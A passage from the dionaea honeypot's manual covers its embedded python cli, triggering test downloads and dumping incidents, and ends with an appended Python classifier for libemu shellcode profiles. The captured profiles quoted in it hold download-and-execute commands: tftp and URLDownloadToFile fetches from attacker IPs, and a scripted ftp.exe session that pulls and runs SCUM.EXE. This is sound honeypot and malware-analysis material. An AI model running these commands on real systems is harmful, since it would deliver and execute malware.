2784 the python call stack and calling some of the macros can and in most
2785 cases will segfault dionaea, therefore use backtrace to make sure you
2786 are still within valid frames. We can’t use pystack or pystackv as
2787 they rely on Py_Main, which is an invalid assumption for embedded
2788 python.
2789
dionaea embeds a python interpreter, and can therefore offer a python
cli too. The python cli is blocking: if you start entering a command,
the whole process will wait for you to finish it, and not accept any
new connections. You can use the python cli to interact with dionaea,
which is very useful for development and debugging.
2796
2797 Configuration
2798 You can access the dionaea.conf via python (readonly):
2799
2800 from dionaea import g_dionaea
2801 g_dionaea.config()
2802
Completion and History on the CLI
If you use the cli often, you can make it behave like a real shell,
including history and completion:
2806
2807 import rlcompleter, readline
2808 readline.parse_and_bind('tab: complete')
2809
2810 Triggering Downloads
Sometimes it helps to trigger a download, without waiting for an
attack. Very useful if you want to verify permissions are correct when
switching the user, or make sure a submission to a 3rd party works
correctly. You can trigger downloads for all major protocols.
2815
2816 ftp
2817 from dionaea.ftp import ftp
2818 f = ftp()
2819 f.download(None, 'anonymous','guest','ftp.kernel.org',21, 'welcome.msg', 'binary','ftp://ftp.kernel.org/welcome.msg')
2820
2821 tftp
2822 from dionaea.tftp import TftpClient
2823 t = TftpClient()
2824 t.download(None, 'tftp.example.com', 69, 'filename')
2825
2826 http
As the http download is not done in python, we do not use the download
facility directly, but create an incident, which will trigger the
download:
2830
2831 from dionaea.core import incident
2832 i = incident("dionaea.download.offer")
2833 i.set("url", "http://www.honeynet.org")
2834 i.report()
2835
2836 incidents
2837 incidents are the ipc used in dionaea.
2838
2839 dumping
from dionaea.core import ihandler
class idumper(ihandler):
    def __init__(self, pattern):
        ihandler.__init__(self, pattern)
    def handle(self, icd):
        icd.dump()

a = idumper('*')
2848
2849 emu profile
Small collection of various shellcode profiles gathered from dionaea.
2851
2852 CreateProcess Commands
2853 This profile will trigger a download via tftp.
2854
2855 p='[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2856 from dionaea.core import incident
2857 i = incident("dionaea.module.emu.profile")
2858 i.set("profile", str(p))
2859 i.report()
2860
2861 URLDownloadToFile
2862 This profile will trigger a download.
2863
2864 p='[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, {"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]'
2865 from dionaea.core import incident
2866 i = incident("dionaea.module.emu.profile")
2867 i.set("profile", str(p))
2868 i.report()
2869
2870 WinExec Commands
This profile uses WinExec to create a command file for the windows ftp
client, downloads a file, and executes the file:
2873
2874 p='[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2875 from dionaea.core import incident
2876 i = incident("dionaea.module.emu.profile")
2877 i.set("profile", str(p))
2878 i.report()
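
The Payloads section above describes how dionaea guesses the attacker's intention from a libemu profile, and the profiles in this section show the JSON shape the emu plugin reports. As an added example that is not part of dionaea, the classifier below parses such a profile, names the payload class, and extracts the files offered for download; the hosts and file names in the samples are constructed, and the tftp.exe / scripted ftp.exe patterns are an assumption about the command lines the cmd.exe emulation has to parse.

```python
"""Added example (not dionaea code): classify a libemu shellcode profile.

The profile format is the JSON list of {"call", "args", "return"} records
shown above; the sample hosts/files below are constructed, and the
tftp.exe / ftp -s:script command patterns are an assumption about what
the cmd.exe emulation has to parse."""
from __future__ import annotations

import json
import re
from typing import Any

# tftp.exe -i HOST get FILE
TFTP_RE = re.compile(r"tftp(?:\.exe)?\s+-i\s+(\S+)\s+get\s+(\S+)", re.IGNORECASE)
# scripted ftp.exe session written with echo ... > i ; ftp -n -s:i
FTP_OPEN_RE = re.compile(r"echo\s+open\s+(\S+)\s+(\d+)", re.IGNORECASE)
FTP_USER_RE = re.compile(r"echo\s+user\s+(\S+)\s+(\S+)", re.IGNORECASE)
FTP_GET_RE = re.compile(r"echo\s+get\s+(\S+)", re.IGNORECASE)


def parse_profile(profile_json: str) -> list[dict[str, Any]]:
    """Parse an emu profile and reject anything not shaped like one."""
    calls = json.loads(profile_json)
    if not isinstance(calls, list):
        raise ValueError("profile must be a JSON list of API calls")
    for entry in calls:
        if not isinstance(entry, dict) or "call" not in entry:
            raise ValueError(f"malformed profile entry: {entry!r}")
        if not isinstance(entry.get("args"), list):
            raise ValueError(f"args must be a list: {entry!r}")
    return calls


def offers_from_command(cmd: str) -> list[str]:
    """Derive download URLs from a cmd.exe command line (tftp or ftp script)."""
    offers = [f"tftp://{host}/{name}" for host, name in TFTP_RE.findall(cmd)]
    opened = FTP_OPEN_RE.search(cmd)
    if opened:
        host, port = opened.groups()
        user = FTP_USER_RE.search(cmd)
        cred = f"{user.group(1)}:{user.group(2)}@" if user else ""
        offers += [f"ftp://{cred}{host}:{port}/{name}" for name in FTP_GET_RE.findall(cmd)]
    return offers


def classify_profile(profile_json: str) -> dict[str, Any]:
    """Return the payload class from the Payloads section, the files offered
    for download, and the command lines the shellcode wanted executed."""
    result: dict[str, Any] = {"kind": "unknown", "offers": [], "commands": []}
    for entry in parse_profile(profile_json):
        call, args = entry["call"], entry["args"]
        if call == "URLDownloadToFile" and len(args) >= 2:
            # args: [pCaller, szURL, szFileName, dwReserved, lpfnCB]
            kind, offers, cmd = "URLDownloadToFile", [args[1]], None
        elif call == "WinExec" and args:
            # args: [lpCmdLine, uCmdShow]
            kind, offers, cmd = "Exec", offers_from_command(args[0]), args[0]
        elif call == "CreateProcess" and len(args) >= 2:
            # args: [lpApplicationName, lpCommandLine, ...]
            kind, offers, cmd = "CreateProcess", offers_from_command(args[1]), args[1]
        else:
            continue  # LoadLibraryA, Sleep, ExitThread, ... carry no intention
        if result["kind"] == "unknown":
            result["kind"] = kind  # the first meaningful call decides the class
        result["offers"] += offers
        if cmd:
            result["commands"].append(cmd)
    return result


# Constructed samples in the page's profile format (hosts and names made up).
PROFILE_TFTP = json.dumps([
    {"call": "CreateProcess", "return": "-1",
     "args": ["", "tftp.exe -i 192.0.2.10 get ssms.exe", "", "", "1", "40", "", "", {}, {}]},
    {"call": "CreateProcess", "return": "-1",
     "args": ["", "ssms.exe", "", "", "1", "40", "", "", {}, {}]},
    {"call": "ExitThread", "args": ["0"], "return": "0"},
])
PROFILE_URLMON = json.dumps([
    {"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"},
    {"call": "URLDownloadToFile", "return": "0",
     "args": ["", "http://192.0.2.20/compiled.exe", "47.scr", "0", "0"]},
    {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"},
])
PROFILE_FTP = json.dumps([
    {"call": "WinExec", "return": "32",
     "args": ["cmd /c echo open ftp.example.invalid 21 > i&echo user wat l0l1 >> i "
              "&echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\r\n", "0"]},
    {"call": "ExitThread", "args": ["0"], "return": "0"},
])

if __name__ == "__main__":
    for name, profile in [("tftp", PROFILE_TFTP), ("urlmon", PROFILE_URLMON), ("ftp", PROFILE_FTP)]:
        print(name, classify_profile(profile))
```

The offers it returns correspond to the offer: lines readlogsqltree prints for a recorded attack; feeding them to a download is deliberately left to dionaea's own incident handling.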
2879
2887 dionaea
2888
2890 2021, dionaea
2891
2892
2893
2894
28950.7.0 Jul 21, 2021 DIONAEA(1)